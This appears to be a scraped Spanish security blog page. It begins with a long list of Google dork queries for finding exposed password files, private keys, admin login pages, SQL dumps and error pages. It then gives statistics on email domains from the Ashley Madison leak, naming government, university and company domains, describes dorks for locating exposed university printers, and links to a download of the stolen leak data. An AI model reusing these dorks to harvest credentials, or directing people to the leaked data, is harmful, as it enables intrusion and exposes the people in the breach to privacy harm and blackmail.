inurl:yapboz_detay.asp + View Webcam User Accessing allinurl:control/multiview inurl:"ViewerFrame?Mode=" intitle:"WJ-NT104 Main Page" inurl:netw_tcp.shtml intitle:"supervisioncam protocol" LeapFTP intitle:"index.of./" sites.ini modified master.passwd mysql history files NickServ registration passwords passlist passlist.txt (a better way) passwd passwd / etc (reliable) people.lst psyBNC config files pwd.db server-dbs "intitle:index of" signin filetype:url spwd.db / passwd trillian.ini wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin [WFClient] Password= filetype:ica "bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com "Emergisoft web applications are a part of our" "Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights- "HostingAccelerator" intitle:"login" +"Username" -"news" -demo "iCONECT 4.1 :: Login" "IMail Server Web Messaging" intitle:login "inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com "intitle:3300 Integrated Communications Platform" inurl:main.htm "Login - Sun Cobalt RaQ" "login prompt" inurl:GM.cgi "Login to Usermin" inurl:20000 "Microsoft CRM : Unsupported Browser Version" "OPENSRS Domain Management" inurl:manage.cgi "pcANYWHERE EXPRESS Java Client" "Please authenticate yourself to get access to the management interface" "please log in" "Please login with admin pass" -"leak" -sourceforge CuteNews" "2003..2005 CutePHP" DWMail" password intitle:dwmail Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com Midmart Messageboard" "Administrator Login" Monster Top List" MTL numrange:200- UebiMiau" -site:sourceforge.net "site info for" "Enter Admin Password" "SquirrelMail version" "By the SquirrelMail development Team" "SysCP - login" "This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac "This section is for Administrators only. If you are an administrator then please" "ttawlogin.cgi/?action=" "VHCS Pro ver" -demo "Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com "WebExplorer Server - Login" "Welcome to WebExplorer Server" "WebSTAR Mail - Please Log In" "You have requested access to a restricted area of our website. Please authenticate yourself to continue." "You have requested to access the management functions" -.edu (intitle:"Please login - Forums UBB.threads")|(inurl:login.php "ubb") (intitle:"Please login - Forums WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=") (intitle:"rymo Login")|(intext:"Welcome to rymo") -family (intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration") (inurl:"ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil 4images Administration Control Panel allintitle:"Welcome to the Cyclades" allinurl:"exchange/logon.asp" allinurl:wps/portal/ login ASP.login_aspx "ASP.NET_SessionId" CGI:IRC Login ext:cgi intitle:"control panel" "enter your owner password to continue!" ez Publish administration filetype:php inurl:"webeditor.php" filetype:pl "Download: SuSE Linux Openexchange Server CA" filetype:r2w r2w intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press admin account info" filetype:log !Host=*.* intext:enc_UserPassword=* ext:pcf "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password=*" "http://*:*@www” domainname "index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site:sourceforge.net "parent directory" +proftpdpasswd Elite Forum Version *.*" Link Department" "sets mode: +k" "your password is" filetype:log DUpaypal" -site:duware.com allinurl: admin mdb auth_user_file.txt config.php eggdrop filetype:user user enable password | secret "current configuration" -intext:the etc (index.of) Login (" Jetbox One CMS â?¢" | " Jetstream ? *") Novell NetWare intext:"netware management portal version" Outlook Web Access (a better way) PhotoPost PHP Upload PHPhotoalbum Statistics PHPhotoalbum Upload phpWebMail Please enter a valid password! inurl:polladmin INDEXU Ultima Online loginservers W-Nailer Upload Area intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu "#mysql dump" filetype:sql "#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3 "allow_call_time_pass_reference" "PATH_INFO" "Certificate Practice Statement" inurl:(PDF | DOC) "Generated by phpSystem" "generated by wwwstat" "Host Vulnerability Summary Report" "HTTP_FROM=googlebot" googlebot.com "Server_Software=" "Index of" / "chat/logs" "Installed Objects Scanner" inurl:default.asp "MacHTTP" filetype:log inurl:machttp.log "Mecury Version" "Infastructure Group" "Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log "Most Submitted Forms and s?ri?ts" "this section" "Network Vulnerability Assessment Report" "not for distribution" confidential "not for public release" -.edu -.gov -.mil "phone * * *" "address *" "e-mail" intitle:"curriculum vitae" "phpMyAdmin" "running on" inurl:"main.php" "produced by getstats" "Request Details" "Control Tree" "Server Variables" "robots.txt" "Disallow:" filetype:txt "Running in Child mode" "sets mode: +p" "sets mode: +s" "Thank you for your order" +receipt "This is a Shareaza Node" "This report was generated by WebLog" ( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject (intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results") (intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob (inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt +":8080″ +":3128″ +":80″ filetype:txt +"HSTSNR" -"netop.com" -site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp 94FBR "ADOBE PHOTOSHOP" AIM buddy lists allinurl:/examples/jsp/snp/snoop.jsp allinurl:cdkey.txt allinurl:servlet/SnoopServlet cgiirc.conf cgiirc.conf contacts ext:wml data filetype:mdb -site:gov -site:mil exported email addresses inurl:confidential Financial spreadsheets: finance.xls Financial spreadsheets: finances.xls Ganglia Cluster Reports haccess.ctl (one way) haccess.ctl (VERY reliable) ICQ chat logs, please… RedKernel" ipsec.conf ipsec.secrets ipsec.secrets Lotus Domino address books mail filetype:csv -site:gov intext:name Microsoft Money Data Files mt-db-pass.cgi files MySQL tabledata dumps mystuff.xml - Trillian data files OWA Public Folders (direct view) Peoples MSN contact lists php-addressbook "This is the addressbook for *" -warning phpinfo() phpMyAdmin dumps phpMyAdmin dumps private key files (.csr) private key files (.key) Quicken data files rdbqds -site:.edu -site:.mil -site:.gov robots.txt site:edu admin grades site:www.mailinator.com inurl:ShowMail.do SQL data dumps Squid cache server reports Unreal IRCd WebLog Referrers Welcome to ntop! Fichier contenant des informations sur le r?seau : filetype:log intext:"ConnectionManager2″ "apricot - admin" 00h "by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" "Network Host Assessment Report" "Internet Scanner" "Output produced by SysWatch *" "Phorum Admin" "Database Connection" inurl:forum inurl:admin phpOpenTracker" Statistics "powered | performed by Beyond Security's Automated Scanning" -kazaa -example "Shadow Security Scanner performed a vulnerability assessment" "SnortSnarf alert page" "The following report contains confidential information" vulnerability -search "The statistics were last upd?t?d" "Daily"-microsoft.com "this proxy is working fine!" "enter *" "URL***" * visit "This report lists" "identified by Internet Scanner" "Traffic Analysis for" "RMON Port * on unit *" "Version Info" "Boot Version" "Internet Settings" ((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) Analysis Console for Incident Databases ext:cfg radius.cfg ext:cgi intext:"nrg-" " This web page was created on " intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm Looking Glass site:netcraft.com intitle:That.Site.Running Apache "A syntax error has occurred" filetype:ihtml "access denied for user" "using password" "An illegal character has been found in the statement" -"previous message" "ASP.NET_SessionId" "data source=" "Can't connect to local" intitle:warning "Chatologica MetaSearch" "stack tracking" "detected an internal error [IBM][CLI Driver][DB2/6000]" "error found handling the request" cocoon filetype:xml "Fatal error: Call to undefined function" -reply -the -next "Incorrect syntax near" "Incorrect syntax near" "Internal Server Error" "server at" "Invision Power Board Database Error" "ORA-00933: SQL command not properly ended" "ORA-12541: TNS:no listener" intitle:"error occurred" "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php "PostgreSQL query failed: ERROR: parser: parse error" "Supplied argument is not a valid MySQL result resource" "Syntax error in query expression " -the "The s?ri?t whose uid is " "is not allowed to access" "There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser." "Unable to jump to row" "on MySQL result index" "on line" "Unclosed quotation mark before the character string" "Warning: Bad arguments to (join|implode) () in" "on line" -help -forum "Warning: Cannot modify header information - headers already sent" "Warning: Division by zero in" "on line" -forum "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum "Warning: mysql_query()" "invalid query" "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL" "Warning: Supplied argument is not a valid File-Handle resource in" "Warning:" "failed to open stream: HTTP request failed" "on line" "Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line" "SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" An unexpected token "END-OF-STATEMENT" was found Coldfusion Error Pages ht://Dig htsearch error IIS 4.0 error messages IIS web server error messages Internal Server Error intext:"Error Message : Error loading required libraries." intext:"Warning: Failed opening" "on line" "include_path" MYSQL error message: supplied argument…. mysql error with query Netscape Application Server Error page ORA-00921: unexpected end of SQL command ORA-00921: unexpected end of SQL command ORA-00936: missing expression PHP application warnings failing "include_path" sitebuildercontent sitebuilderfiles sitebuilderpictures Snitz! forums db path error SQL syntax error Supplied argument is not a valid PostgreSQL result warning "error on line" php sablotron Windows 2000 web server error messages "ftp://” "www.eastgame.net" "html allowed" guestbook : vBulletin Version 1.1.5″ "Select a database to view" intitle:"filemaker pro" "set up the administrator user" inurl:pivot "There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row "Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin "Welcome to Intranet" "Welcome to PHP-Nuke" congratulations "Welcome to the Prestige Web-Based Configurator" "YaBB SE Dev Team" "you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos ("Indexed.By"|"Monitored.By") hAcxFtpScan (inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=) allinurl:"index.php" "site=sglinks" allinurl:install/install.php allinurl:intranet admin filetype:cgi inurl:"fileman.cgi" filetype:cgi inurl:"Web_Store.cgi" filetype:php inurl:vAuthenticate filetype:pl intitle:"Ultraboard Setup" Gallery in configuration mode Hassan Consulting's Shopping Cart Version 1.18 intext:"Warning: * am able * write ** configuration file" "includes/configure.php" - natterchat inurl:home.asp -site:natterchat.co.uk XOOPS Custom Installation Duclassified" -site:duware.com "DUware All Rights reserved" duclassmate" -site:duware.com Dudirectory" -site:duware.com dudownload" -site:duware.com
Hay mucho correo gratuito y de ISPs, pero también de universidad, además de empresas, administración… Vamos, que aquí no se salva nadie.
También está la información de los pagos (¡algunos de decenas de miles de euros!), donde hay eg.10 de cuentas @MADRID.ES, 2 de @MCAFEE.COM o un asesor del parlamento europeo, pero también ahí hay correos no válidos.
Top 10 de dominios:
GMAIL.COM 5450764 33.2245% YAHOO.COM 4658560 28.3957% HOTMAIL.COM 2277592 13.8828% AOL.COM 756312 4.61002% LIVE.COM 213440 1.301% OUTLOOK.COM 181000 1.10327% COMCAST.NET 145626 0.887647% MSN.COM 127918 0.77971% YMAIL.COM 116966 0.712953% YAHOO.CA 102098 0.622327%
Dominios .es:
@hotmail.es 158851 50.9893% @yahoo.es 89233 28.6427% @outlook.es 22162 7.11374% @terra.es 10885 3.49396% @gmx.es 3936 1.26341% @wanadoo.es 2091 0.671186% @HOTMAIL.ES 2041 0.655137% @gmail.es 1705 0.547285% @YAHOO.ES 992 0.31842% @ozu.es 990 0.317778% @orangemail.es 894 0.286963% @Yahoo.es 713 0.228865% @movistar.es 600 0.192593% @hotmai.es 510 0.163704% @orange.es 482 0.154716% @Hotmail.es 429 0.137704% @OUTLOOK.ES 377 0.121013% @homail.es 268 0.0860248% @Outlook.es 245 0.0786421% @TERRA.ES 223 0.0715804% @aol.es 219 0.0702964% @live.es 214 0.0686915% @arrakis.es 202 0.0648396% @vodafone.es 193 0.0619507% @hotmeil.es 162 0.0520001% @andaluciajunta.es 140 0.0449383% @hotmal.es 140 0.0449383% @telecable.es 138 0.0442964% @hotmail.com.es 126 0.0404445% @yaho.es 124 0.0398025% @teleline.es 121 0.0388396% @outlok.es 118 0.0378766% @hotmil.es 111 0.0356297% @yahho.es 93 0.0298519% @hormail.es 88 0.028247% @outloo.es 88 0.028247% @hotamil.es 87 0.027926% @msn.es 82 0.026321% @htmail.es 80 0.0256791% @yaoo.es 78 0.0250371% @hoymail.es 76 0.0243951% @ono.es 76 0.0243951% @autlook.es 72 0.0231111% @Terra.es 69 0.0221482% @yahoo.com.es 66 0.0211852% @hotmial.es 64 0.0205432% @hotmail.ES 60 0.0192593% @gemail.es 55 0.0176543% @alumni.uv.es 54 0.0173334% @outook.es 54 0.0173334% @email.es 53 0.0170124% @otmail.es 53 0.0170124% @outllok.es 51 0.0163704% @oulook.es 50 0.0160494% @inicia.es 48 0.0154074% @outloock.es 47 0.0150864% @a.es 45 0.0144445% @holmail.es 45 0.0144445% @telefonica.es 44 0.0141235% @ctv.es 43 0.0138025% @GMX.ES 43 0.0138025% @hitmail.es 41 0.0131605% @hotamail.es 40 0.0128395% @alu.ua.es 39 0.0125185% @gotmail.es 39 0.0125185% @usal.es 38 0.0121975% @hotail.es 37 0.0118766% @htomail.es 37 0.0118766% @yhoo.es 36 0.0115556% @outlock.es 35 0.0112346% @outlook.com.es 35 0.0112346% @WANADOO.ES 35 0.0112346% @uotlook.es 34 0.0109136% @juntadeandalucia.es 33 0.0105926% @otlook.es 33 0.0105926% @jerez.es 32 0.0102716% @hayoo.es 31 0.00995063% @hotmsil.es 31 0.00995063% @OZU.ES 30 0.00962964% @correo.ugr.es 29 0.00930866% @gva.es 29 0.00930866% @hotmaill.es 29 0.00930866% @GMAIL.ES 28 0.00898767% @hptmail.es 28 0.00898767% @ahoo.es 27 0.00866668% @jotmail.es 27 0.00866668% @um.es 26 0.00834569% @homtail.es 25 0.0080247% @uco.es 25 0.0080247% @yahooo.es 25 0.0080247% @iberia.es 24 0.00770372% @us.es 24 0.00770372% @yahoo.ES 24 0.00770372% @blackberry.orange.es 23 0.00738273% @et.mde.es 23 0.00738273% @Gmail.es 23 0.00738273% @hotnail.es 23 0.00738273% @icam.es 23 0.00738273% @iespana.es 23 0.00738273% @jet.es 23 0.00738273% @uji.es 23 0.00738273% @yohoo.es 23 0.00738273% @pepe.es 22 0.00706174% @pp.es 22 0.00706174% @ymail.es 21 0.00674075% @es.es 20 0.00641976% @mobileemail.vodafone.es 20 0.00641976% @unizar.es 20 0.00641976% @yhaoo.es 20 0.00641976% @endesa.es 19 0.00609877% @google.es 19 0.00609877% @utlook.es 19 0.00609877% @arquired.es 18 0.00577779% @lycos.es 18 0.00577779% @ORANGEMAIL.ES 18 0.00577779% @uv.es 18 0.00577779% @yahhoo.es 18 0.00577779% @alumni.unav.es 17 0.0054568% @example.es 17 0.0054568% @hotmali.es 17 0.0054568% @icab.es 17 0.0054568% @jahoo.es 17 0.0054568% @yajoo.es 17 0.0054568% @adslmail.es 16 0.00513581% @hoitmail.es 16 0.00513581% @mail.es 16 0.00513581% @mundivia.es 16 0.00513581% @tahoo.es 16 0.00513581% @ucm.es 16 0.00513581% @ugr.es 16 0.00513581% @yayoo.es 16 0.00513581% @adif.es 15 0.00481482% @holtmail.es 15 0.00481482% @hotmaul.es 15 0.00481482% @icav.es 15 0.00481482% @iies.es 15 0.00481482% @live.uem.es 15 0.00481482% @renfe.es 15 0.00481482% @as.es 14 0.00449383% @cgac.es 14 0.00449383% @excite.es 14 0.00449383% @outloook.es 14 0.00449383% @tinet.fut.es 14 0.00449383% @alumnos.unex.es 13 0.00417285% @alum.us.es 13 0.00417285% @edu.xunta.es 13 0.00417285% @fastmail.es 13 0.00417285% @hoail.es 13 0.00417285% @hootmail.es 13 0.00417285% @hotmaail.es 13 0.00417285% @hotmaiil.es 13 0.00417285% @hotmaol.es 13 0.00417285% @houtlook.es 13 0.00417285% @outlokk.es 13 0.00417285% @outoolk.es 13 0.00417285% @wanado.es 13 0.00417285% @asd.es 12 0.00385186% @carm.es 12 0.00385186% @hhotmail.es 12 0.00385186% @HOMAIL.ES 12 0.00385186% @hotmail.es.es 12 0.00385186% @hotmailo.es 12 0.00385186% @hottmail.es 12 0.00385186% @MOVISTAR.ES 12 0.00385186% @opendeusto.es 12 0.00385186% @orangecorreo.es 12 0.00385186% @ouylook.es 12 0.00385186% @udc.es 12 0.00385186% @comb.es 11 0.00353087% @ee.es 11 0.00353087% @estudiantes.unileon.es 11 0.00353087% @fn.mde.es 11 0.00353087% @hot.es 11 0.00353087% @hotmael.es 11 0.00353087% @mixmail.es 11 0.00353087% @ORANGE.ES 11 0.00353087% @tera.es 11 0.00353087% @tiscali.es 11 0.00353087% @upv.es 11 0.00353087% (…) (empiezo a resumir) @alumnes.udl.es 8 0.00256791% @alumnos.uchceu.es 8 0.00256791% @alumnos.unican.es 8 0.00256791% @indra.es 8 0.00256791% @oc.mde.es 8 0.00256791% @sevilla.es 8 0.00256791% @uca.es 8 0.00256791% @uniovi.es 8 0.00256791% @abc.es 7 0.00224692% @aena.es 7 0.00224692% @ctac.es 7 0.00224692% @ea.mde.es 7 0.00224692% @er.es 7 0.00224692% @uam.es 7 0.00224692% @aragon.es 6 0.00192593% @badajoz.es 6 0.00192593% @cam.upv.es 6 0.00192593% @comerciales.es 6 0.00192593% @cv.gva.es 6 0.00192593% @eee.es 6 0.00192593% @estumail.ucm.es 6 0.00192593% @Fons.es 6 0.00192593% @gmax.es 6 0.00192593% @guardiacivil.es 6 0.00192593% @banesto.es 5 0.00160494% @bankinter.es 5 0.00160494% @cajamar.es 5 0.00160494% @cecot.es 5 0.00160494% @coam.es 5 0.00160494% @cograsova.es 5 0.00160494% @coitt.es 5 0.00160494% @fomento.es 5 0.00160494% @justicia.es 5 0.00160494% @madrid.es 5 0.00160494% @marca.es 5 0.00160494% @postal.uv.es 5 0.00160494% @rmseguros.es 5 0.00160494% @TELEFONICA.ES 5 0.00160494% @uma.es 5 0.00160494% @UOTLOOK.ES 5 0.00160494% @usc.es 5 0.00160494% @castillalamancha.es 4 0.00128395% @gruposantander.es 4 0.00128395% @iberdrola.es 4 0.00128395% @icajaen.es 4 0.00128395% @icali.es 4 0.00128395% @instanet.es 4 0.00128395% @janira.es 4 0.00128395% @jccm.es 4 0.00128395% @kelman.es 4 0.00128395% @lacaixa.es 4 0.00128395% @leroymerlin.es 4 0.00128395% @love.es 4 0.00128395% @mail.ucv.es 4 0.00128395% @mbe.es 4 0.00128395% @meditex.es 4 0.00128395% @ocaso.es 4 0.00128395% @rai.usc.es 4 0.00128395% @salud.aragon.es 4 0.00128395% @ual.es 4 0.00128395% @urjc.es 4 0.00128395% @uvigo.es 4 0.00128395% @alumnos.uvigo.es 3 0.000962964% @alum.uax.es 3 0.000962964% @alum.uca.es 3 0.000962964% @alu.uclm.es 3 0.000962964% @alu.uhu.es 3 0.000962964% @amoraoptical.es 3 0.000962964% @ANDALUCIAJUNTA.ES 3 0.000962964% @arq.uva.es 3 0.000962964% @aytobadajoz.es 3 0.000962964% @campus.uab.es 3 0.000962964% @correos.es 3 0.000962964% @cruzroja.es 3 0.000962964% @dgp.mir.es 3 0.000962964% @diputada.congreso.es 3 0.000962964% @elpais.es 3 0.000962964% @epsa.upv.es 3 0.000962964% @epsg.upv.es 3 0.000962964% @estudiante.ujaen.es 3 0.000962964% @etsia.upv.es 3 0.000962964% @heineken.es 3 0.000962964% @industria.ccoo.es 3 0.000962964% @phonehouse.es 3 0.000962964% @red.ujaen.es 3 0.000962964% @rtve.es 3 0.000962964% @satse.es 3 0.000962964% @securitasdirect.es 3 0.000962964% @segurosjorgegalan.es 3 0.000962964% @seinco.es 3 0.000962964% @sek.es 3 0.000962964% @senado.es 3 0.000962964% @sergas.es 3 0.000962964% @upct.es 3 0.000962964% @upo.es 3 0.000962964% @ure.es 3 0.000962964% @usp.ceu.es 3 0.000962964% @vaesa.gec.es 3 0.000962964% @valencia.es 3 0.000962964% @vaseco.es 3 0.000962964% @alumni.eude.es 2 0.000641976% @alumnos.nebrija.es 2 0.000641976% @alumnos.urjc.es 2 0.000641976% @alu.ulpgc.es 2 0.000641976% @alu.umh.es 2 0.000641976% @aytolacoruna.es 2 0.000641976% @aytolalaguna.es 2 0.000641976% @bbva.es 1 0.000320988% @ceuta.es 2 0.000641976% @cfhh.es 2 0.000641976% @cfnavarra.es 2 0.000641976% @cgpj.es 2 0.000641976% @comercio.mineco.es 2 0.000641976% @dipgra.es 2 0.000641976% @dipucadiz.es 2 0.000641976% @diputado.congreso.es 2 0.000641976% @edu.uah.es 2 0.000641976% @efe.es 2 0.000641976% @elcorteingles.es 2 0.000641976% @gobcantabria.es 2 0.000641976% @iesandorra.es 2 0.000641976% @iesvalledeljerteplasencia.es 2 0.000641976% @JEREZ.ES 2 0.000641976% @libertyseguros.es 2 0.000641976% @seat.es 2 0.000641976% @uax.es 2 0.000641976% @ubu.es 2 0.000641976% @uc3m.es 2 0.000641976% @ucv.udc.es 2 0.000641976% @uem.es 2 0.000641976% @ufg.es 2 0.000641976% @uic.es 2 0.000641976% @ull.edu.es 2 0.000641976% @uned.es 2 0.000641976% @unipost.es 2 0.000641976% @uno.es 2 0.000641976% @upm.es 2 0.000641976% @upvnet.upv.es 2 0.000641976% @agro.uva.es 1 0.000320988% @aytoburgos.es 1 0.000320988% @ayto-ciuadreal.es 1 0.000320988% @aytopuentegenil.es 1 0.000320988% @aytosalamanca.es 1 0.000320988% @aytotomelloso.es 1 0.000320988% @burgos.es 1 0.000320988% @CAJAESPANA.ES 1 0.000320988% @cajamurcia.es 1 0.000320988% @cajastur.es 1 0.000320988% @CAJASTUR.ES 1 0.000320988% @cajatur.es 1 0.000320988% @colegiolainmaculada.es 1 0.000320988% @DANONE.ES 1 0.000320988% @eco.juntaex.es 1 0.000320988% @ecolav.es 1 0.000320988% @ecomadrid.es 1 0.000320988% @eco.uc3m.es 1 0.000320988% @eduardoruiz.es 1 0.000320988% @educacio.caib.es 1 0.000320988% @educacion.navarra.es 1 0.000320988% @educandoalfuego.es 1 0.000320988% @educan.es 1 0.000320988% @Edu.xunta.es 1 0.000320988% @ecuxseguridad.es 1 0.000320988% @edelvives.es 1 0.000320988% @fnac.es 1 0.000320988% @funerariadejesus.es 1 0.000320988% @funge.uva.es 1 0.000320988% @gijon.es 1 0.000320988% @gmail.outlook.es 1 0.000320988% @grupobbva.es 1 0.000320988% @mibbva.es 1 0.000320988% @microsoft.es 1 0.000320988% @proconsa.es 1 0.000320988% @puleva.es 1 0.000320988% @PULEVA.ES 1 0.000320988% @qf.uva.es 1 0.000320988% @ucavila.es 1 0.000320988% @uchceu.es 1 0.000320988% @uclm.es 1 0.000320988% @ucoeleo.es 1 0.000320988% @UCO.ES 1 0.000320988% @udada.es 1 0.000320988% @udon.es 1 0.000320988% @UGR.es 1 0.000320988% @ugvhg.es 1 0.000320988% @uhu.es 1 0.000320988% @uhwjhf.es 1 0.000320988% @uib.es 1 0.000320988% @ujaen.es 1 0.000320988% @ulloahotmail.es 1 0.000320988% @ulpgc.es 1 0.000320988% @umano.es 1 0.000320988% @umivale.es 1 0.000320988% @uml.es 1 0.000320988% @umor.es 1 0.000320988% @unav.es 1 0.000320988% @zara.es 1 0.000320988%
…y un largo etcétera. hasta 5730 dominios .es de los 33623 totales.
Países de origen de las transacciones (no disponible en todas)
US 7591509 78.3125% CA 823746 8.4976% BR 197032 2.03254% AU 146745 1.51379% TW 118338 1.22075% CL 109875 1.13345% ZA 78126 0.805932% AR 75314 0.776924% JP 74165 0.765071% GB 57901 0.597295% CO 53466 0.551545% NZ 39648 0.409001% MX 36701 0.3786% ES 33213 0.342619% ← IN 27862 0.287419% KR 17947 0.185138% HK 16704 0.172315% FR 15115 0.155923% IT 14624 0.150858% VE 12012 0.123913% SE 10879 0.112226% CH 10463 0.107934% IL 8854 0.0913361% NO 7242 0.074707% DE 6365 0.0656601% IE 6082 0.0627407% CN 6076 0.0626788% FI 5875 0.0606053% PT 5797 0.0598007% SG 5183 0.0534668% GR 3573 0.0368584% NL 3360 0.0346611% AT 2427 0.0250364% BE 2419 0.0249539% DK 2064 0.0212918% AE 1600 0.0165053% PE 1596 0.016464% PR 1589 0.0163918% CZ 1528 0.0157625% HU 1183 0.0122036% PL 1003 0.0103467% TR 925 0.00954212% BM 912 0.00940801% MY 749 0.00772653% UY 724 0.00746864% AF 681 0.00702506% PH 544 0.0056118% MO 503 0.00518885% LU 402 0.00414695% TH 384 0.00396127% SK 359 0.00370337% SA 358 0.00369306% PA 350 0.00361053% EC 261 0.00269242% QA 232 0.00239327% VI 227 0.00234169% KW 209 0.002156% BS 185 0.00190842% KY 177 0.0018259% CR 174 0.00179495% UZ 168 0.00173305% NA 166 0.00171242% TT 156 0.00160926% GU 154 0.00158863% OM 151 0.00155769% GE 141 0.00145453% HR 132 0.00136169% RU 131 0.00135137% IS 125 0.00128948% GT 123 0.00126884% JO 123 0.00126884% PY 116 0.00119663% ID 105 0.00108316% RO 104 0.00107284% PK 103 0.00106253% DO 101 0.0010419% SV 101 0.0010419% CY 98 0.00101095% MZ 92 0.000949054% EG 89 0.000918106% FX 88 0.00090779% JM 85 0.000876843% GP 83 0.000856211% MC 71 0.000732422% AO 69 0.00071179% UG 69 0.00071179% LK 67 0.000691159% VA 66 0.000680843% LB 64 0.000660211% LI 64 0.000660211% VU 61 0.000629264% WF 61 0.000629264% BB 59 0.000608632% KE 56 0.000577685% ZM 55 0.000567369% CF 50 0.00051579% ZW 50 0.00051579% BW 49 0.000505474% HN 49 0.000505474% YE 49 0.000505474% LV 47 0.000484843% SZ 47 0.000484843% VG 47 0.000484843% BH 46 0.000474527% BO 44 0.000453895% NC 39 0.000402316% VN 39 0.000402316% MT 38 0.000392% AL 37 0.000381685% PG 36 0.000371369% GI 34 0.000350737% TV 34 0.000350737% BG 33 0.000340421% KN 33 0.000340421% EE 31 0.00031979% AD 30 0.000309474% NI 27 0.000278527% TD 27 0.000278527% SI 26 0.000268211% CV 25 0.000257895% NE 25 0.000257895% BN 24 0.000247579% FM 22 0.000226948% TZ 22 0.000226948% CC 21 0.000216632% GH 21 0.000216632% RE 21 0.000216632% GA 20 0.000206316% GD 20 0.000206316% DZ 19 0.000196% IM 17 0.000175369% RS 17 0.000175369% UA 17 0.000175369% TM 16 0.000165053% AW 15 0.000154737% AN 14 0.000144421% MK 14 0.000144421% SB 14 0.000144421% BZ 13 0.000134105% MQ 13 0.000134105% YT 13 0.000134105% TJ 12 0.00012379% IQ 11 0.000113474% FK 10 0.000103158% NP 10 0.000103158% PS 10 0.000103158%
De todos es conocido que existen multitud de dispositivos conectados y accesibles desde Internet. El portal Shodan nos permite buscar este tipo de dispositivos.
Sin embargo no hace falta irse tan lejos y en el propio Google no es nada difícil buscar todo tipo de dispositivos. Así por ejemplo, introduciendo este dork:
inurl:es this.LCDispatcher
...Google nos va a mostrar las impresoras HP accesibles desde Internet. Ya de paso, se le ha pedido que en la URL aparezca "es", de España. Hace dos meses, cuando hice esta búsqueda aparecieron más de 20 impresoras. Tras informar a las diferentes universidades (solo una me dio las gracias, ;-P ), veo que aún se pueden encontrar 8 dispositivos conectados:
Lo más grave de todo es que es posible cambiar la configuración de la impresora, ver los logs de impresión e incluso enviar ficheros PDF para que sean impresos, con el correspondiente gasto de papel y tinta (excepto la última, que lo tienen protegido con contraseña).
Nótese el caso de la impresora de la universidad de Vigo, en la que algún desalmado les ha cambiado la configuración a un lenguaje bastante ininteligible (Noruego o algo así).
Aunque en el listado proporcionado por Google aparecia alguna impresora más, yo me centré en los que pertenecían a universidades españolas (que eran la mayoría).
Dentro de un par de meses habrá que volver a comprobar si queda alguna aún accesible o las han quemado los curiosos.
El pasado 19 de Agosto se publicaron los datos robados a Ashley Madison que incluía, entre otros, los nombres de usuario, las direcciones de correo electrónico y datos personales, como altura, peso, etc. También se incluye un fichero con fotos de perfil que aparentemente esta corrupto.
Los datos de este leak se pueden obtener descargándose un torrent de https://yuc3i3hat65rpl7t.onion.to/stuff/impact-team-ashley-release.html
Para quien no lo conozca Ashley madison es una página de citas para poner los cuernos a tu pareja. Pero no es una página cualquiera, es la más utilizada para este fin, con más de 30 millones de usuarios en todo el mundo.
En la página web HaveIBeenPwned.com podemos buscar las direcciones de correo de nuestros conocidos a ver si "han sido mal@s".
En Pastebin a las pocas horas empezaron a salir listados de correos. Entre ellos se filtró uno de los dominios ".es" encontrados. Hacen un total de 311538 direcciones de correo.
En los próximos días iré publicando extractos de este listado que me han parecido interesantes. Cada uno que saque sus conclusiones.
Como era de prever, los dominios más comunes fueron los de yahoo, gmail, hotmail, etc.
161417 hotmail.es 90977 yahoo.es 22796 outlook.es 11178 terra.es 3982 gmx.es 2130 wanadoo.es 1757 gmail.es 1020 ozu.es 912 orangemail.es 613 movistar.es
Sólo estos 10 suponen el 95% de esos 311500 correos encontrados. A mi personalmente me ha llamado la atención que gmail sea sólo el 7º proveedor de correo de este listado. Eso hace pensar que son gente "de la vieja escuela" que se crearon sus cuentas de correo hace al menos 10 años.
Lo siguiente que llama la atención es que no tenemos ni idea de inglés ni de escribir a máquina. Hasta 3736 direcciones de correo (un 1,2%) estaban mal escritas. Cuesta pensar en más combinaciones de errores... X-D
